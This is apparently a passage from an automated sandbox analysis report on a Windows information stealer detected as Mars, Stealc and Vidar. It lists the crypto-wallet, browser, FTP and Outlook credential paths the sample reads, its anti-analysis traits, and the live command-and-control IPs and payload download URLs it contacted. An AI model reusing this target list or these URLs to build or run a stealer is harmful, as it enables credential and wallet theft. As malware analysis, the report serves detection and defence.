Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.1858205526.0000000000D56000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1jPL5zru3u.exe PID: 6980, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1858205526.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1jPL5zru3u.exe PID: 6980, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1858205526.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1jPL5zru3u.exe PID: 6980, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1464487 Sample: 1jPL5zru3u.exe Startdate: 28/06/2024 Architecture: WINDOWS Score: 100 49 Snort IDS alert for network traffic 2->49 51 Found malware configuration 2->51 53 Antivirus detection for URL or domain 2->53 55 13 other signatures 2->55 8 1jPL5zru3u.exe 36 2->8         started        13 explorti.exe 2->13         started        15 explorti.exe 2->15         started        process3 dnsIp4 43 85.28.47.4, 49731, 80 GES-ASRU Russian Federation 8->43 45 77.91.77.81, 49732, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 8->45 35 C:\Users\user\AppData\...\CAEHDBAAEC.exe, PE32 8->35 dropped 37 C:\Users\user\AppData\...\softokn3[1].dll, PE32 8->37 dropped 39 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 8->39 dropped 41 11 other files (7 malicious) 8->41 dropped 65 Detected unpacking (changes PE section rights) 8->65 67 Tries to steal Mail credentials (via file / registry access) 8->67 69 Found many strings related to Crypto-Wallets (likely being stolen) 8->69 77 4 other signatures 8->77 17 cmd.exe 1 8->17         started        19 cmd.exe 2 8->19         started        71 Hides threads from debuggers 13->71 73 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->73 75 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->75 file5 signatures6 process7 process8 21 CAEHDBAAEC.exe 4 17->21         started        25 conhost.exe 17->25         started        27 conhost.exe 19->27         started        file9 33 C:\Users\user\AppData\Local\...\explorti.exe, PE32 21->33 dropped 57 Antivirus detection for dropped file 21->57 59 Detected unpacking (changes PE section rights) 21->59 61 Machine Learning detection for dropped file 21->61 63 5 other signatures 21->63 29 explorti.exe 12 21->29         started        signatures10 process11 dnsIp12 47 77.91.77.82, 49743, 49745, 49746 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 29->47 79 Antivirus detection for dropped file 29->79 81 Detected unpacking (changes PE section rights) 29->81 83 Tries to detect sandboxes and other dynamic analysis tools (window names) 29->83 85 6 other signatures 29->85 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true
85.28.47.4
 unknown Russian Federation
31643 GES-ASRU true
77.91.77.82
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.91.77.81/mine/amadka.exe true
  • Avira URL Cloud: phishing
 unknown
http://77.91.77.82/Hun4Ko/index.php true
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.4/69934896f997d5bb/softokn3.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/mozglue.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/nss3.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/freebl3.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/920475a59bac849d.php true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/sqlite3.dll true
  • Avira URL Cloud: malware
 unknown
85.28.47.4/920475a59bac849d.php true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/msvcp140.dll true
  • Avira URL Cloud: malware
 unknown